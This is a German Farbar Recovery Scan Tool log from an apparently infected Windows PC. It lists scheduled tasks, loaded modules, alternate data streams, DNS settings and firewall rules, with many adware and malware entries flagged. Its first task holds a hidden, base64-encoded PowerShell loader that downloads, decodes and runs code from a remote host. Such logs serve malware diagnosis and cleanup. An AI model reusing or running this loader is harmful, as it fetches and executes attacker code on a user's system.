Task: {5EBFB1F8-88B5-4AEB-9E89-26746BE7A02D} - System32\Tasks\{28325A84-A9DE-5181-98DC-72E8BE19248C} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGwAaQBrAGUAcgB1AHQALgBpAG4AZgBvAC8AdQAvAD8AcQA9AFAAbQBXAHoAQQB2AHYAeABfAGMAcABFAHkAZQA4AFoAUQBPAFcARgBIAHkAUABKAFgAcgBRAHkALQBLAGQAZgB4AG8AUwB6AEsAcABwADkAWQBsAGcAcgBpAEsASQBrAGgAaQBqAG0AYwBIAGkAawBpAHQAWgA5ADEAcQBZAGUAcwA3ADIAWgBwADQAXwBUAFgAMQBZAEEAQgBNAEgAYwBUAHkASQBVAGwAMwBUAEUAcABOAGoALQB3AE4AZwByAGIARgBJAE4ARwB5ADkAUQBPADcAVAA5ADMASQBkAG8AMQBoAHIARgBoADgANgBSAGIAdQBLAEkAZwA3AFMAUgBnAGgAYgBaAHcATQBsAE4ATAByAHgAZQBPAFkASAAzAEoAUgBQAF8ARQBFADEAVQBNADQAZABIAHcASABFAGoAcgBMAEoAYQBRAGMASwBhAEoAdQBiADEAaQBtADAAVQBrAEEAcABDAFoAawBhAHoAcABwAHcATQBnAHIAVQAzAEQASgBFAHoAZwBEADgAegAtAEMAUQAzADQAbwBlAGsAbAB4AFEATABsAGsALQBvADEAVgBOADUAOQBJAEEAZQBhAHkAcgBaAFEAUAB4AG4ASgBXAHEAZQA3ADgAUABfAGEATQBBAFcAeABrAGsAdwBXAFcANwBDAE4ASwB5AFAARABOAHkAaQBDADQATAB1ADkAbgBVADUARQBYAGIAdwBnAHcAUgBHAEkASABNAEYAOABrAGEASQBCAEwARgBlAGYAeABCAEIAawBCADEAWQBUADIASwBoAFoANQBHAHcAMwBnAF8AVQA2AFAAcAB0ADUAOQBxAFAANQBXAEsAagBsAEwAQQAzADIATAA1AE0ANABHADkAawA4AHUARwB2ADMAOQBTAHMAaABCADUAUABnAHkANQB5AGQANQBQAHMAaQBJAFUATgBHADgASAAwAEoAbgBIADEASgBNAGIAbABCAGIAUwB4AGwANQBVAHQATgBWAEgASAB0ADcAVAB1AEsAZgBlAGMAUABHAE8ANgBMAEYAYgBXAC0AbwA2ADYAcQB5AFUATwAxADgAcABRAEIASwBNAHoAawBOAHEAeAB4AEYAcgBXAE4AYwBSAGUAUQBuAEQAcwBsADYANwBkADEATQBwAHYAWgBNAEwAOABFAHAAMgBiAEwAYQBHAHQAcAA0AG4AZgB2AGkAMQBvAEQAOQBZAFcATgAzAFUAJgBjAD0ASwA1AHkARAB0AEoASgBqAGsAZwBGAEMATwAyAFcAcQBJAEsARwBLAEoAZgBsAGwAZwBoAFIAdgBNAFgANQA2AEgAcQBSAHAAMgAyAFAARwB4AFIARQA3AHEAYgBzAEMAVABFAHgAUwBvAG0AQgBnADUAZwBjAFgAUwByADQAZQBVAFQASABfAE8AQgBiAFIAMQAtAGcAeQAxAEsAUQBoAFgANwAzAGkAaABTAEIAXwB2AEEAXwBJAEgAdwB3ADYANABQAHIAVQBMADQAbABWAEIAcABEAFYAWAAzAFgAagBmAHIAUgA0ADkAQwBJAGEAOQBoADEAdgBHAFQAWABHADUAOQBYAEsAaQBQAF8AcwAzAFIAcgB5AG8AZgBpAEYASQBSAE4ATwBZAHIAMABmAFkANQBoAEYAbAAxAF8ATQBJAFgAdgBCAC0AZgA0AFAASQA5ADEAbQBnAGMAaQBpAEIAVgA4ADQAcQBOAEMAQwBsAFQAZwBWAHgAYQBoAC0AegBHAHcAcgBqAEsAYwBHADYAOQBKAFMASgBMAC0AbwBFAGMAdQBsAGcANwBDADEANQBFAFkAUABqAGwANwBNADEAcwBkAGcAcwBDAFIAawBYAFgAWQBLAHAARQBZAFkAcQBZAHIAVQB2AEgAaQB1AFQAaABtAHcAcQBtADcASgBfAHEASgA3AG8AZgBjAG4ANQA2AHEAaABTAHEAeAB0AGoAbQBfAHgAYwBQAHQAYQBXAHMASQB0ADIANgBvAHQATABiADYALQBYAHEAeQB4AF8ARwBtAHUAcQBVAGQASQB6AGIAegAyADQASQAyAHIAQgBnADgAdABJAGgAdABmAFkASQBCAEEAZgAwAFUAbABfAEgAYwBmAGMAbABsAEQAeABIAG8AZQA5AGwATABxADMAaABjAGMARAB6AFUAcwBzAEUAZAA2AEEARAByAHkAMQBBAEcAUQBIADAAbgB1AFIAZQBGAEwAQwAzAFgAMgBKAE4AMAAyAHYANwBaAG0AbABVAEUAdABpAEQARQBuAEwAWABFAFAAMABXAGgAdAA1AHgAdwB0AFMATABSAG8AUwAwAG0ATwBtAGgANAA2AE8ANwBXAHUAdwBZAHYAZAB5AGgAcgByADIAcwBKAEsAVwBrAFYAWABlADkAUABHAFIAeABtAG0AXwA2AEsASQBUAFkANAB2AEQAUQBqAFUAdAAyADYARQAzADMAdgBTAE4AbgBNAE8AUQBQAGQAZQBSAHYAQQB1ADQAYgBzAG8ANQBuAEIAOAAwAGYAOQBlADcAXwBZAGoAVABnAG8AUAByAGYATQBLAHQASwBxAGgAZQBtAFQAawAxAEoAWABEAEsANQBVAGsAMABDAHoATAB3ADYAQQB4AHQAMwBMAFYASQAzAHQANABJAGsARgB0AHkASwBEAHAANAAzAFEARwBSADEAQQBwADIAUABnAEcAMwBvAFUAZgBfADgAOQBfAHYAZgBoAGsATABxAFIAQQBVAE8AMQA1ADEAYQBWADgAWQBLAFIASgAtAEQAQQBsAE8AbQB4AEIAVQB5AFYAQwBUAGkAcQA1AHQAbAAxADAAdwBIAHcAOABHAGoAawBGAHIAbgBSAEQAZABLAGwARwBSAFAAdwBQAGkAUQBrAGEAYQBQADkAVQBGAEQAcgA0AEcAMwBEAEYAdQB2AFIAaAA4ADkASgBpAFoAQwB4AGEAQwBhAEcAdQAzADMAWQBxAEYAXwAtAHQAYwBpAFYAVQBnAGcARwBVADkAdABOAHoAdwB0ADkAJgByAD0AMQA2ADQAMwAwADAAOQAzADAAOQA4ADcAMwA3ADgANQAxADMANAAiADsAJABzAHQAcwBrAD0AIgB7ADIAOAAzADIANQBBADgANAAtAEEAOQBEAEUALQA1ADEAOAAxAC0AOQA4AEQAQwAtADcAMgBFADgAQgBFADEAOQAyADQAOABDAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {6547E57D-4808-40FB-9FA9-C1A592A6F982} - System32\Tasks\{BA18FF5F-EC80-4F08-B6A5-67790B43475D} => pcalua.exe -a "C:\Program Files (x86)\Plus-HD-5.0\Uninstall.exe" -c /fromcontrolpanel=1
Task: {6C3547A8-0D1D-4FDE-AEBA-6176B3E9FCD5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {8FB4BCDC-484E-4E5D-8A4F-4624732C64C5} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {9CDF866B-9C28-4409-A728-713E5A1BEA5A} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {9FCCD376-FC5D-448B-849A-79A2205FF57C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-07-22] (Piriform Ltd)
Task: {A04598EA-0499-4F37-9782-5B24163322DF} - \Plus-HD-5.0-codedownloader -> Keine Datei <==== ACHTUNG
Task: {A0968CD4-D421-49DB-9263-225E4A391C1C} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2015-12-15] (AVAST Software)
Task: {A1B59E68-5238-4BEB-A69F-008681DF416B} - \Plus-HD-5.0-updater -> Keine Datei <==== ACHTUNG
Task: {A850A267-193D-46A9-B152-447325C0DD39} - System32\Tasks\Advanced System Protector => C:\Program Files (x86)\RegClean Pro\SystweakASP.exe <==== ACHTUNG
Task: {ACFF0C35-B6D7-4F3E-B0F0-613FC3D60A40} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {B0C6AFA1-C598-4A23-9813-8C3814592EAC} - System32\Tasks\Superclean => c:\programdata\{c9728bcd-ea62-4578-c972-28bcdea62f37}\hqghumeaylnlf.exe [2014-08-16] (Super PC Tools Ltd) <==== ACHTUNG
Task: {B4097C40-6620-404F-9E2F-24D63FC42ECA} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ACHTUNG
Task: {BD456B59-2276-423A-9C2A-6E1BF42A6F46} - \Plus-HD-5.0-firefoxinstaller -> Keine Datei <==== ACHTUNG
Task: {C05747F5-1745-465D-A13D-0E23D35F17F4} - \Plus-HD-5.0-chromeinstaller -> Keine Datei <==== ACHTUNG
Task: {D7AB0E18-2921-4AA2-80CB-D2DCA1272CE6} - System32\Tasks\SmartWeb Upgrade Trigger Task => C:\Users\Özkan\AppData\Local\SmartWeb\SmartWebHelper.exe <==== ACHTUNG
Task: {D97022AC-E5C8-4C9A-AD06-69969C655663} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {DD46DE76-7339-48AB-8295-84A25F09A341} - System32\Tasks\gg_uac_daemon_Özkan => C:\Users\Özkan\Documents\my games\PB\gamedata\ggdllhost.exe
Task: {DEDEDC1E-CAA1-43C4-B91B-2464B34057A5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-09] (Adobe Systems Incorporated)
Task: {FA896F4F-A556-4D46-9FA7-07A5D8BE02BF} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\KYG1QOVT.job => C:\Users\�zkan\AppData\Roaming\KYG1QOVT.exe <==== ACHTUNG
Task: C:\Windows\Tasks\lm6V3l7.job => C:\Users\�zkan\AppData\Roaming\lm6V3l7.exe <==== ACHTUNG
Task: C:\Windows\Tasks\Plus-HD-5.0-chromeinstaller.job => C:\Program Files (x86)\Plus-HD-5.0\Plus-HD-5.0-chromeinstaller.exe̲/installcrx /crxinstalltype=0 /agentregpath='Plus-HD-5.0' /extensionfilepath C:\Program Files (x86)\Plus-HD-5.0\47718.crx' /appid=47718 /srcid='000781' /subid='0' /zdata='0' /bic=C359C626C95B4E5CBD081A44F7140E51IE /verifier=72c7b492ab027068bcbe04a04f6a53c4 /installerversion=1_31_153 /installerfullversion=1.31.153.3 /installationtime=1389964238 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== ACHTUNG
Task: C:\Windows\Tasks\Plus-HD-5.0-enabler.job => C:\Program Files (x86)\Plus-HD-5.0\Plus-HD-5.0-enabler.exeƕ/enablebho /agentregpath='Plus-HD-5.0' /appid=47718 /srcid='000781' /subid='0' /zdata='0' /bic=C359C626C95B4E5CBD081A44F7140E51IE /verifier=72c7b492ab027068bcbe04a04f6a53c4 /installerversion=1_31_153 /installationtime=1389964238 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== ACHTUNG
Task: C:\Windows\Tasks\Plus-HD-5.0-firefoxinstaller.job => C:\Program Files (x86)\Plus-HD-5.0\Plus-HD-5.0-firefoxinstaller.exeͳ/installxpi /agentregpath='Plus-HD-5.0' /extensionfilepath C:\Program Files (x86)\Plus-HD-5.0\47718.xpi' /appid=47718 /srcid='000781' /subid='0' /zdata='0' /bic=C359C626C95B4E5CBD081A44F7140E51IE /verifier=72c7b492ab027068bcbe04a04f6a53c4 /installerversion=1_31_153 /installerfullversion=1.31.153.3 /installationtime=1389964238 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /waitforbrowser=300 /extensionid=8c6c8c15-21d7-4f62-8a57-202aee8f7fb3@6567ba21-e435-4eb0-838d-8395b2265c30.com /extensionversion=0.93 /prefsbranch=a8c6c8c1521d74f628a57202aee8f7fb36567ba21e4354eb0838d8395b2265c30com47718 /updateurl=hxxps:/w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/47718.rdf <==== ACHTUNG
Task: C:\Windows\Tasks\Plus-HD-5.0-updater.job => C:\Program Files (x86)\Plus-HD-5.0\Plus-HD-5.0-updater.exeǸ/runupdater /agentregpath='Plus-HD-5.0' /appid=47718 /srcid='000781' /subid='0' /zdata='0' /bic=C359C626C95B4E5CBD081A44F7140E51IE /verifier=72c7b492ab027068bcbe04a04f6a53c4 /installerversion=1_31_153 /installationtime=1389964238 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /geoserviceurl=hxxp:/ipgeoapi.com/ /updatejsondomain=hxxp:/update.srvstatsdata.com /updaterversion=2 /monetizationdomain=hxxp:/stats.syncstatsdata.com <==== ACHTUNG
Task: C:\Windows\Tasks\QiQMvbuugirF3MbSxPFk0Y.job => C:\Users\�zkan\AppData\Roaming\QiQMvbuugirF3MbSxPFk0Y.exe <==== ACHTUNG
Task: C:\Windows\Tasks\rmMkisrweHV4RuaBdLxOYzzbuC5.job => C:\Users\�zkan\AppData\Roaming\rmMkisrweHV4RuaBdLxOYzzbuC5.exe <==== ACHTUNG
Task: C:\Windows\Tasks\Superclean.job => c:\programdata\{c9728bcd-ea62-4578-c972-28bcdea62f37}\hqghumeaylnlf.exe <==== ACHTUNG

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-09-11 18:02 - 2015-09-11 18:02 - 00803488 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2013-07-29 19:38 - 2012-03-27 01:33 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2015-12-21 20:17 - 2013-09-03 13:29 - 00101328 _____ () C:\Program Files\Bitdefender\Bitdefender 2016\bdmetrics.dll
2015-12-21 20:17 - 2015-12-03 19:22 - 00876888 _____ () C:\Program Files\Bitdefender\Bitdefender 2016\otengines_001_001\ashttpbr.mdl
2015-12-21 20:17 - 2015-12-03 19:22 - 00742976 _____ () C:\Program Files\Bitdefender\Bitdefender 2016\otengines_001_001\ashttpdsp.mdl
2015-12-21 20:17 - 2015-12-03 19:22 - 02803536 _____ () C:\Program Files\Bitdefender\Bitdefender 2016\otengines_001_001\ashttpph.mdl
2015-12-21 20:17 - 2015-12-03 19:22 - 01415584 _____ () C:\Program Files\Bitdefender\Bitdefender 2016\otengines_001_001\ashttprbl.mdl
2015-12-21 20:17 - 2015-12-04 17:59 - 00505576 _____ () C:\Program Files\Bitdefender\Bitdefender 2016\intermsec.dll
2015-12-21 20:18 - 2015-12-04 18:01 - 00158720 _____ () C:\Program Files\Bitdefender\Bitdefender 2016\ui\ltr\intermsec.ui
2015-12-21 20:18 - 2015-12-11 19:03 - 00030208 _____ () C:\Program Files\Bitdefender\Bitdefender 2016\lang\en-US\intermsec.txtui
2015-12-21 20:18 - 2015-12-11 19:03 - 00004608 _____ () C:\Program Files\Bitdefender\Bitdefender 2016\lang\en-US\bdaphconp.txtui
2015-12-21 20:17 - 2015-11-16 14:51 - 00051352 _____ () C:\Program Files\Bitdefender\Bitdefender 2016\bddpsp.dll
2015-10-22 12:22 - 2015-10-22 12:22 - 00175080 _____ () C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\quazip.dll
2015-10-22 12:21 - 2015-10-22 12:21 - 00103400 _____ () C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\soundbackends\directsound_win64.dll
2015-10-22 12:21 - 2015-10-22 12:21 - 00108008 _____ () C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\soundbackends\windowsaudiosession_win64.dll
2015-10-22 12:22 - 2015-10-22 12:22 - 00312296 _____ () C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\plugins\clientquery_plugin.dll
2015-10-22 12:22 - 2015-10-22 12:22 - 00483816 _____ () C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\plugins\teamspeak_control_plugin.dll
2015-09-21 15:24 - 2015-09-21 15:24 - 00317440 _____ () C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\ssleay32.dll
2015-09-21 15:24 - 2015-09-21 15:24 - 01709056 _____ () C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\LIBEAY32.dll
2014-10-18 15:40 - 2014-10-18 15:40 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\1eeea3ab8d69ec722bdcb28b8eb8dd75\IsdiInterop.ni.dll
2013-07-29 19:34 - 2012-02-01 15:25 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2013-07-29 19:51 - 2012-02-08 02:39 - 01198872 ____R () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData:NT
AlternateDataStreams: C:\ProgramData:NT2
AlternateDataStreams: C:\Users\All Users:NT
AlternateDataStreams: C:\Users\All Users:NT2
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2
AlternateDataStreams: C:\ProgramData\Application Data:NT
AlternateDataStreams: C:\ProgramData\Application Data:NT2
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2
AlternateDataStreams: C:\Users\Özkan\Anwendungsdaten:NT
AlternateDataStreams: C:\Users\Özkan\Anwendungsdaten:NT2
AlternateDataStreams: C:\Users\Özkan\AppData\Roaming:NT
AlternateDataStreams: C:\Users\Özkan\AppData\Roaming:NT2

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1539430812-113463742-2149372525-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 199.203.131.151 - 82.163.143.181
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

MSCONFIG\startupreg: FlashPlayerUpdate => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_152_Plugin.exe -update plugin
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{0C8F46B7-5D5F-431E-ADA8-8C17F61322AB}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [{E7350369-DD38-419A-A7AF-738A7A50CDBC}] => (Allow) C:\ProgramData\NexonEU\NGM\NGM.exe
FirewallRules: [TCP Query User{21455C06-6716-43BB-B154-3F07883EB7B7}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [UDP Query User{F2CA4BCA-A699-4C84-ABE1-D89C204D6ABD}C:\windows\syswow64\javaw.exe] => (Allow) C:\windows\syswow64\javaw.exe
FirewallRules: [TCP Query User{21B1FB1D-2CBC-4F19-81F1-C5D31357AD35}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
